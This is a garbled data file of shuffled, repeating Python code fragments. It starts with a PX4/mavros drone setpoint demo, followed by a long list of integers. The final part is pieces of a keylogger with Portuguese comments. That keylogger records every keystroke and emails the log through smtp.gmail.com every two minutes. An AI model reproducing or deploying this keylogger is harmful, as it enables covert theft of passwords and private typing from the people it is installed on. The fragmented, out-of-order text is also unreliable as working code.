"its contributors may be # * used to endorse or promote products derived",
"offset_x y = radius * sin(i*2*pi/sides) + offset_y z = offset_z wait =",
"this list of conditions and the following disclaimer in # * the documentation",
"written permission. # * # * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT",
"self.reached) def navigate(self): rate = self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header =",
"\"Fly to the right\" setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly to the left\"",
"sw=4 et: # # # **************************************************************************** # * # * Copyright (c) 2015",
"wait = False delay = 0 if (i == 0 or i ==",
"to the left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0 offset_y = 0.0",
"= 5 setpoint.set(x, y, z, delay, wait) i = i + 1 rate.sleep()",
"OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # * LIMITED TO, THE IMPLIED WARRANTIES",
"\"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate a slow landing. setpoint.set(0.0,",
"IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # * LIMITED",
"INCLUDING, BUT NOT # * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND",
"yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y, z, delay=0, wait=True):",
"yaw_degrees = 0 # North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw)",
"from mavros.utils import * from std_msgs.msg import Header from std_msgs.msg import String from",
"copyright # * notice, this list of conditions and the following disclaimer. #",
"provided that the following conditions # * are met: # * # *",
"0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\" if __name__ == '__main__': try:",
"from std_msgs.msg import Header from std_msgs.msg import String from tf.transformations import quaternion_from_euler class",
"start thread\" # TODO(simon): Clean this up. self.done = False self.done_evt = threading.Event()",
"# * used to endorse or promote products derived from this software #",
"not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) + offset_x y = radius *",
"* used to endorse or promote products derived from this software # *",
"def set(self, x, y, z, delay=0, wait=True): self.done = False self.x = x",
"BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND ON ANY THEORY OF LIABILITY, WHETHER",
"in binary form must reproduce the above copyright # * notice, this list",
"5) break # Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0,",
"* are met: # * # * 1. Redistributions of source code must",
"rate.sleep() if (i > sides): print \"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5) break",
"Redistributions of source code must retain the above copyright # * notice, this",
"Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y",
"> sides): print \"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate a",
"PoseStamped, Quaternion from math import * from mavros.srv import CommandBool from mavros.utils import",
"= y self.z = z if wait: rate = rospy.Rate(5) while not self.done:",
"setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0,",
"binary form must reproduce the above copyright # * notice, this list of",
"derived from this software # * without specific prior written permission. # *",
"Climb to the starting height first i = 0 while not rospy.is_shutdown(): x",
"we will lock yaw/heading to north. yaw_degrees = 0 # North yaw =",
"delay=0, wait=True): self.done = False self.x = x self.y = y self.z =",
"self.z # For demo purposes we will lock yaw/heading to north. yaw_degrees =",
"from this software # * without specific prior written permission. # * #",
"* cos(i*2*pi/sides) + offset_x y = radius * sin(i*2*pi/sides) + offset_y z =",
"= 0 while not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) + offset_x y",
"rospy self.x = 0.0 self.y = 0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate,",
"OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL,",
"LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # * FOR A",
"y = radius * sin(i*2*pi/sides) + offset_y z = offset_z wait = False",
"nor the names of its contributors may be # * used to endorse",
"# * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # *",
"permission. # * # * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS",
"WHETHER IN CONTRACT, STRICT # * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)",
"THE # * POSSIBILITY OF SUCH DAMAGE. # * # **************************************************************************** import rospy",
"0.0, 8.0, 5) offset_x = 0.0 offset_y = 0.0 offset_z = 10.0 sides",
"= False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate",
"(i == 0 or i == sides): # Let it reach the setpoint.",
"names of its contributors may be # * used to endorse or promote",
"following disclaimer in # * the documentation and/or other materials provided with the",
"must reproduce the above copyright # * notice, this list of conditions and",
"may be # * used to endorse or promote products derived from this",
"z, delay=0, wait=True): self.done = False self.x = x self.y = y self.z",
"# * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED #",
"= rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z,",
"3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0,",
"reproduce the above copyright # * notice, this list of conditions and the",
"import PoseStamped, Quaternion from math import * from mavros.srv import CommandBool from mavros.utils",
"thread import threading import time from geometry_msgs.msg import PoseStamped, Quaternion from math import",
"\"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly to the right\" setpoint.set(10.0, 4.0, 8.0,",
"= offset_z wait = False delay = 0 if (i == 0 or",
"reach the setpoint. wait = True delay = 5 setpoint.set(x, y, z, delay,",
"= z if wait: rate = rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def",
"= radius * sin(i*2*pi/sides) + offset_y z = offset_z wait = False delay",
"IF ADVISED OF THE # * POSSIBILITY OF SUCH DAMAGE. # * #",
"# **************************************************************************** # * # * Copyright (c) 2015 UAVenture AG. All rights",
"= rospy.Rate(10) setpoint = Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0,",
"OR SERVICES; LOSS # * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)",
"OR OTHERWISE) ARISING IN # * ANY WAY OUT OF THE USE OF",
"- self.x) < 0.5 and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z -",
"setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly to the right\" setpoint.set(10.0, 4.0, 8.0, 5)",
"self.navigate, () ) except: print \"Error: Unable to start thread\" # TODO(simon): Clean",
"IN NO EVENT SHALL THE # * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE",
"reserved. # * Author: <NAME> <<EMAIL>> # * # * Redistribution and use",
"CONTRACT, STRICT # * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN",
"False self.x = x self.y = y self.z = z if wait: rate",
"circle\" setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the starting height first i",
"WARRANTIES OF MERCHANTABILITY AND FITNESS # * FOR A PARTICULAR PURPOSE ARE DISCLAIMED.",
"OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # * ANY WAY OUT",
"self.pub = pub self.rospy = rospy self.x = 0.0 self.y = 0.0 self.z",
"this up. self.done = False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached)",
"* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED",
"pub, rospy): self.pub = pub self.rospy = rospy self.x = 0.0 self.y =",
"the left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0 offset_y = 0.0 offset_z",
"0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5)",
"rospy import thread import threading import time from geometry_msgs.msg import PoseStamped, Quaternion from",
"self.pub.publish(msg) rate.sleep() def set(self, x, y, z, delay=0, wait=True): self.done = False self.x",
"# * distribution. # * 3. Neither the name PX4 nor the names",
"OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE",
"= Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y, z, delay=0, wait=True): self.done =",
"Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y, z, delay=0, wait=True): self.done = False",
"5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly to the right\" setpoint.set(10.0,",
"EVEN IF ADVISED OF THE # * POSSIBILITY OF SUCH DAMAGE. # *",
"cos(i*2*pi/sides) + offset_x y = radius * sin(i*2*pi/sides) + offset_y z = offset_z",
"# * Author: <NAME> <<EMAIL>> # * # * Redistribution and use in",
"# * # * Redistribution and use in source and binary forms, with",
"1 rate.sleep() if (i > sides): print \"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5)",
"10hz msg = PoseStamped() msg.header = Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now()",
"# * # * Copyright (c) 2015 UAVenture AG. All rights reserved. #",
"time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x -",
"setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint =",
"this software # * without specific prior written permission. # * # *",
"= self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header = Header() msg.header.frame_id = \"base_footprint\"",
"list of conditions and the following disclaimer. # * 2. Redistributions in binary",
"and abs(topic.pose.position.z - self.z) < 0.5: self.done = True self.done_evt.set() def setpoint_demo(): pub",
"SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT LIMITED TO, PROCUREMENT",
"i = 0 while not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) + offset_x",
"5) print \"Fly to the left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0",
"= self.x msg.pose.position.y = self.y msg.pose.position.z = self.z # For demo purposes we",
"self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10)",
"* distribution. # * 3. Neither the name PX4 nor the names of",
"radius * sin(i*2*pi/sides) + offset_y z = offset_z wait = False delay =",
"self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header = Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp",
"the following disclaimer. # * 2. Redistributions in binary form must reproduce the",
"THE COPYRIGHT HOLDERS AND CONTRIBUTORS # * \"AS IS\" AND ANY EXPRESS OR",
"msg.pose.position.z = self.z # For demo purposes we will lock yaw/heading to north.",
"* # **************************************************************************** import rospy import thread import threading import time from geometry_msgs.msg",
"in source and binary forms, with or without # * modification, are permitted",
"OTHERWISE) ARISING IN # * ANY WAY OUT OF THE USE OF THIS",
"self.x = x self.y = y self.z = z if wait: rate =",
"* without specific prior written permission. # * # * THIS SOFTWARE IS",
"def navigate(self): rate = self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header = Header()",
"except: print \"Error: Unable to start thread\" # TODO(simon): Clean this up. self.done",
"import quaternion_from_euler class Setpoint: def __init__(self, pub, rospy): self.pub = pub self.rospy =",
"2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\" if __name__",
"threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10) # 10hz",
"msg.header = Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x =",
"offset_z wait = False delay = 0 if (i == 0 or i",
"setpoint. wait = True delay = 5 setpoint.set(x, y, z, delay, wait) i",
"and use in source and binary forms, with or without # * modification,",
"self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y -",
"Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print",
"* from mavros.srv import CommandBool from mavros.utils import * from std_msgs.msg import Header",
"0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y, z, delay=0,",
"self.done = False self.x = x self.y = y self.z = z if",
"right\" setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly to the left\" setpoint.set(0.0, 0.0, 8.0,",
"True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate =",
"* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # * FOR",
"Neither the name PX4 nor the names of its contributors may be #",
"= rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z = self.z",
"# * Copyright (c) 2015 UAVenture AG. All rights reserved. # * Author:",
"EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # * LIMITED TO, THE IMPLIED",
"2015 UAVenture AG. All rights reserved. # * Author: <NAME> <<EMAIL>> # *",
"thread.start_new_thread( self.navigate, () ) except: print \"Error: Unable to start thread\" # TODO(simon):",
"setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\" if __name__ ==",
"with the # * distribution. # * 3. Neither the name PX4 nor",
"0.0, -0.2, 2) print \"Bye!\" if __name__ == '__main__': try: setpoint_demo() except rospy.ROSInterruptException:",
"binary forms, with or without # * modification, are permitted provided that the",
"offset_y = 0.0 offset_z = 10.0 sides = 360 radius = 20 print",
"= False delay = 0 if (i == 0 or i == sides):",
"CAUSED # * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT",
"abs(topic.pose.position.z - self.z) < 0.5: self.done = True self.done_evt.set() def setpoint_demo(): pub =",
"* Copyright (c) 2015 UAVenture AG. All rights reserved. # * Author: <NAME>",
"of its contributors may be # * used to endorse or promote products",
"tf.transformations import quaternion_from_euler class Setpoint: def __init__(self, pub, rospy): self.pub = pub self.rospy",
"and the following disclaimer in # * the documentation and/or other materials provided",
"mavros.utils import * from std_msgs.msg import Header from std_msgs.msg import String from tf.transformations",
"self.y = 0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate, () ) except: print",
"- self.z) if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y - self.y) <",
"are permitted provided that the following conditions # * are met: # *",
"disclaimer. # * 2. Redistributions in binary form must reproduce the above copyright",
"1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\" if",
"= PoseStamped() msg.header = Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now() while 1:",
"python # vim:set ts=4 sw=4 et: # # # **************************************************************************** # * #",
"i + 1 rate.sleep() if (i > sides): print \"Fly home\" setpoint.set(0.0, 0.0,",
"* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # * ANY",
"* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #",
"WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE",
"source code must retain the above copyright # * notice, this list of",
"SUCH DAMAGE. # * # **************************************************************************** import rospy import thread import threading import",
"THIS SOFTWARE, EVEN IF ADVISED OF THE # * POSSIBILITY OF SUCH DAMAGE.",
"software # * without specific prior written permission. # * # * THIS",
"setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\" if __name__ == '__main__': try: setpoint_demo() except",
"0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate, () ) except: print \"Error: Unable",
"abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y - self.y)",
"= 0.0 try: thread.start_new_thread( self.navigate, () ) except: print \"Error: Unable to start",
"import * from mavros.srv import CommandBool from mavros.utils import * from std_msgs.msg import",
"self.done = False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self):",
"rospy.Rate(10) setpoint = Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0,",
"import thread import threading import time from geometry_msgs.msg import PoseStamped, Quaternion from math",
"a circle\" setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the starting height first",
"of source code must retain the above copyright # * notice, this list",
"= radius * cos(i*2*pi/sides) + offset_x y = radius * sin(i*2*pi/sides) + offset_y",
"not self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z)",
"and/or other materials provided with the # * distribution. # * 3. Neither",
"= 0.0 offset_y = 0.0 offset_z = 10.0 sides = 360 radius =",
"* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # *",
"self.x) < 0.5 and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z - self.z)",
"the # * distribution. # * 3. Neither the name PX4 nor the",
"* Author: <NAME> <<EMAIL>> # * # * Redistribution and use in source",
"OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # *",
"north. yaw_degrees = 0 # North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0,",
"z = offset_z wait = False delay = 0 if (i == 0",
"yaw/heading to north. yaw_degrees = 0 # North yaw = radians(yaw_degrees) quaternion =",
"and the following disclaimer. # * 2. Redistributions in binary form must reproduce",
"+ offset_x y = radius * sin(i*2*pi/sides) + offset_y z = offset_z wait",
"OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #",
"slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0,",
"AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # * LIMITED TO,",
"THE # * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,",
"\"Fly to the left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0 offset_y =",
"0.5 and abs(topic.pose.position.z - self.z) < 0.5: self.done = True self.done_evt.set() def setpoint_demo():",
"from math import * from mavros.srv import CommandBool from mavros.utils import * from",
"PoseStamped() msg.header = Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x",
"0.0, 10.0, 5) break # Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0, 5)",
"# * # * 1. Redistributions of source code must retain the above",
"0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly to the",
"__init__(self, pub, rospy): self.pub = pub self.rospy = rospy self.x = 0.0 self.y",
"PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # * COPYRIGHT OWNER OR",
"North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg)",
"mavros.srv import CommandBool from mavros.utils import * from std_msgs.msg import Header from std_msgs.msg",
"if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y - self.y) < 0.5 and",
"msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z = self.z # For demo purposes",
"PX4 nor the names of its contributors may be # * used to",
"* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS #",
"forms, with or without # * modification, are permitted provided that the following",
"x = radius * cos(i*2*pi/sides) + offset_x y = radius * sin(i*2*pi/sides) +",
"= \"base_footprint\" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y = self.y",
"quaternion_from_euler class Setpoint: def __init__(self, pub, rospy): self.pub = pub self.rospy = rospy",
"= False self.x = x self.y = y self.z = z if wait:",
"() ) except: print \"Error: Unable to start thread\" # TODO(simon): Clean this",
"0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0,",
"360 radius = 20 print \"Fly in a circle\" setpoint.set(0.0, 0.0, 10.0, 3)",
"NO EVENT SHALL THE # * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR",
"* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # *",
"x self.y = y self.z = z if wait: rate = rospy.Rate(5) while",
"0.0, 10.0, 3) # Climb to the starting height first i = 0",
"while not self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z -",
"use in source and binary forms, with or without # * modification, are",
"height first i = 0 while not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides)",
"INTERRUPTION) HOWEVER CAUSED # * AND ON ANY THEORY OF LIABILITY, WHETHER IN",
"home\" setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate a slow landing. setpoint.set(0.0, 0.0,",
"wait = True delay = 5 setpoint.set(x, y, z, delay, wait) i =",
"navigate(self): rate = self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header = Header() msg.header.frame_id",
"= 0 if (i == 0 or i == sides): # Let it",
"products derived from this software # * without specific prior written permission. #",
"will lock yaw/heading to north. yaw_degrees = 0 # North yaw = radians(yaw_degrees)",
"to the right\" setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly to the left\" setpoint.set(0.0,",
"# 10hz msg = PoseStamped() msg.header = Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp =",
"* # * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS",
"topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y",
"(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # * ANY WAY OUT OF THE",
"PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # * \"AS IS\" AND ANY",
"# * Redistribution and use in source and binary forms, with or without"
] |
[
"for model in models.gan.__all__] semantic_segmentation = [ \"semantic_segmentation.\" + model for model in",
"model for model in models.semantic_segmentation.__all__ ] all_models = gan + semantic_segmentation @pytest.mark.parametrize(\"model\", all_models)",
"@pytest.mark.parametrize(\"model\", all_models) def test_models(model: str) -> None: module = importlib.import_module(\"firewood.models.\" + model) sys.argv",
"] all_models = gan + semantic_segmentation @pytest.mark.parametrize(\"model\", all_models) def test_models(model: str) -> None:",
"model in models.gan.__all__] semantic_segmentation = [ \"semantic_segmentation.\" + model for model in models.semantic_segmentation.__all__",
"sys import pytest from firewood import models gan = [\"gan.\" + model for",
"models.gan.__all__] semantic_segmentation = [ \"semantic_segmentation.\" + model for model in models.semantic_segmentation.__all__ ] all_models",
"model in models.semantic_segmentation.__all__ ] all_models = gan + semantic_segmentation @pytest.mark.parametrize(\"model\", all_models) def test_models(model:",
"gan + semantic_segmentation @pytest.mark.parametrize(\"model\", all_models) def test_models(model: str) -> None: module = importlib.import_module(\"firewood.models.\"",
"from firewood import models gan = [\"gan.\" + model for model in models.gan.__all__]",
"firewood import models gan = [\"gan.\" + model for model in models.gan.__all__] semantic_segmentation",
"import models gan = [\"gan.\" + model for model in models.gan.__all__] semantic_segmentation =",
"= [ \"semantic_segmentation.\" + model for model in models.semantic_segmentation.__all__ ] all_models = gan",
"model for model in models.gan.__all__] semantic_segmentation = [ \"semantic_segmentation.\" + model for model",
"test_models(model: str) -> None: module = importlib.import_module(\"firewood.models.\" + model) sys.argv = [\"\"] module.main()",
"for model in models.semantic_segmentation.__all__ ] all_models = gan + semantic_segmentation @pytest.mark.parametrize(\"model\", all_models) def",
"semantic_segmentation = [ \"semantic_segmentation.\" + model for model in models.semantic_segmentation.__all__ ] all_models =",
"[\"gan.\" + model for model in models.gan.__all__] semantic_segmentation = [ \"semantic_segmentation.\" + model",
"semantic_segmentation @pytest.mark.parametrize(\"model\", all_models) def test_models(model: str) -> None: module = importlib.import_module(\"firewood.models.\" + model)",
"[ \"semantic_segmentation.\" + model for model in models.semantic_segmentation.__all__ ] all_models = gan +",
"importlib import sys import pytest from firewood import models gan = [\"gan.\" +",
"def test_models(model: str) -> None: module = importlib.import_module(\"firewood.models.\" + model) sys.argv = [\"\"]",
"all_models) def test_models(model: str) -> None: module = importlib.import_module(\"firewood.models.\" + model) sys.argv =",
"+ model for model in models.semantic_segmentation.__all__ ] all_models = gan + semantic_segmentation @pytest.mark.parametrize(\"model\",",
"\"semantic_segmentation.\" + model for model in models.semantic_segmentation.__all__ ] all_models = gan + semantic_segmentation",
"= [\"gan.\" + model for model in models.gan.__all__] semantic_segmentation = [ \"semantic_segmentation.\" +",
"models.semantic_segmentation.__all__ ] all_models = gan + semantic_segmentation @pytest.mark.parametrize(\"model\", all_models) def test_models(model: str) ->",
"all_models = gan + semantic_segmentation @pytest.mark.parametrize(\"model\", all_models) def test_models(model: str) -> None: module",
"+ model for model in models.gan.__all__] semantic_segmentation = [ \"semantic_segmentation.\" + model for",
"import pytest from firewood import models gan = [\"gan.\" + model for model",
"import importlib import sys import pytest from firewood import models gan = [\"gan.\"",
"+ semantic_segmentation @pytest.mark.parametrize(\"model\", all_models) def test_models(model: str) -> None: module = importlib.import_module(\"firewood.models.\" +",
"in models.gan.__all__] semantic_segmentation = [ \"semantic_segmentation.\" + model for model in models.semantic_segmentation.__all__ ]",
"gan = [\"gan.\" + model for model in models.gan.__all__] semantic_segmentation = [ \"semantic_segmentation.\"",
"in models.semantic_segmentation.__all__ ] all_models = gan + semantic_segmentation @pytest.mark.parametrize(\"model\", all_models) def test_models(model: str)",
"models gan = [\"gan.\" + model for model in models.gan.__all__] semantic_segmentation = [",
"pytest from firewood import models gan = [\"gan.\" + model for model in",
"= gan + semantic_segmentation @pytest.mark.parametrize(\"model\", all_models) def test_models(model: str) -> None: module =",
"import sys import pytest from firewood import models gan = [\"gan.\" + model"
] |
[
"variável \"self.log\" \"\"\" if self.log: # se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS,",
"linha sempre que um ENTER for pressionado name = \"[ENTER]\\n\" elif name ==",
"um método após uma quantidade de tempo \"intervalo\" from threading import Semaphore, Timer",
"\"space\": # \" \"em vez de \"espaço\" name = \" \" elif name",
"porque on_release () iniciará o ouvinte em um thread separado self.semaphore.acquire() if __name__",
"> 1: # não é um caractere, tecla especial (por exemplo, ctrl, alt",
"contém o log de todos # as teclas dentro de \"self.interval\" self.log =",
"gerencia uma conexão com um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se",
"especial (por exemplo, ctrl, alt etc.) # maiúsculas com [] if name ==",
"sempre que um ENTER for pressionado name = \"[ENTER]\\n\" elif name == \"decimal\":",
"message): # gerencia uma conexão com um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587)",
"= event.name if len(name) > 1: # não é um caractere, tecla especial",
"server.starttls() # faça login na conta de email server.login(email, password) # envie a",
"# gerencia uma conexão com um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) #",
"Semaphore, Timer SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD =",
"maiúsculas com [] if name == \"space\": # \" \"em vez de \"espaço\"",
"email server.login(email, password) # envie a mensagem real server.sendmail(email, email, message) # finaliza",
"com [] if name == \"space\": # \" \"em vez de \"espaço\" name",
"for pressionado name = \"[ENTER]\\n\" elif name == \"decimal\": name = \".\" else:",
"keylogs import smtplib # para enviar email usando o protocolo SMTP (gmail) #",
"(por exemplo, ctrl, alt etc.) # maiúsculas com [] if name == \"space\":",
"f\"[{name.upper()}]\" self.log += name def sendmail(self, email, password, message): # gerencia uma conexão",
"exemplo) \"\"\" name = event.name if len(name) > 1: # não é um",
"\"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY para",
"neste exemplo) \"\"\" name = event.name if len(name) > 1: # não é",
"ocorre porque on_release () iniciará o ouvinte em um thread separado self.semaphore.acquire() if",
"# para keylogs import smtplib # para enviar email usando o protocolo SMTP",
"on_release self.semaphore = Semaphore(0) def callback(self, event): \"\"\" Esse retorno de chamada é",
"finaliza a sessão server.quit() def report(self): \"\"\" Esta função é chamada todo \"self.interval\"",
"bloquear o segmento atual # O temporizador é para executar um método após",
"em um thread separado self.semaphore.acquire() if __name__ == \"__main__\": keylogger = Keylogger(interval=SEND_REPORT_EVERY) keylogger.start()",
"uma conexão com um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao",
"a relatar os keylogs self.report() # bloquear o segmento atual # desde on_release",
"se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em",
"name = event.name if len(name) > 1: # não é um caractere, tecla",
"o segmento atual # O temporizador é para executar um método após uma",
"o que você quiser # imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start() def start(self):",
"== \"enter\": # adicione uma nova linha sempre que um ENTER for pressionado",
"interval): # passaremos SEND_REPORT_EVERY para o intervalo self.interval = interval # esta é",
